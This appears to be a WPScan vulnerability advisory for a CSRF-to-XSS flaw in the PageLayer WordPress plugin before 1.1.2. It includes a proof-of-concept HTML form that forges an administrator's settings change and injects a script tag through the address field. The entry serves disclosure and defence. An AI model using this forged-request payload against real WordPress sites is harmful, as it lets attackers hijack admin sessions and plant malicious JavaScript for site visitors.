Page Builder: PageLayer - Drag and Drop website builder < 1.1.2 - CSRF leading to XSS



Description
A flaw allowed attackers to forge a request on behalf of a site’s administrator to modify the settings of the plugin which could allow for malicious Javascript injection.
Proof of Concept
<html>
<body>
    <form action="http://[site]/wp-admin/admin.php?page=pagelayer" method="POST">
      <input type="hidden" name="pl&#95;support&#95;ept&#91;&#93;" value="post" />
      <input type="hidden" name="pl&#95;support&#95;ept&#91;&#93;" value="page" />
      <input type="hidden" name="pagelayer&#95;content&#95;width" value="" />
      <input type="hidden" name="pagelayer&#95;between&#95;widgets" value="" />
      <input type="hidden" name="pagelayer&#95;body&#95;font" value="" />
      <input type="hidden" name="pagelayer&#95;tablet&#95;breakpoint" value="" />
      <input type="hidden" name="pagelayer&#95;mobile&#95;breakpoint" value="" />
      <input type="hidden" name="pagelayer&#95;icons&#95;set&#91;&#93;" value="font&#45;awesome5" />
      <input type="hidden" name="pagelayer&#45;address" value="&lt;script&gt;alert&#40;0&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="pagelayer&#45;phone" value="&#43;1234567890" />
      <input type="hidden" name="pagelayer&#95;cf&#95;to&#95;email" value="" />
      <input type="hidden" name="submit" value="Save&#32;Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

References

URL https://www.wordfence.com/blog/2020/05/high-severity-vulnerabilities-in-pagelayer-plugin-affect-over-200000-wordpress-sites/

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website https://wordfence.com
Submitter Twitter infosecchloe
Views 1277
Verified No
WPVDB ID 10240

Timeline

Publicly Published 2020-05-28 (about 1 month ago)
Added 2020-05-28 (about 1 month ago)
Last Updated 2020-05-29 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin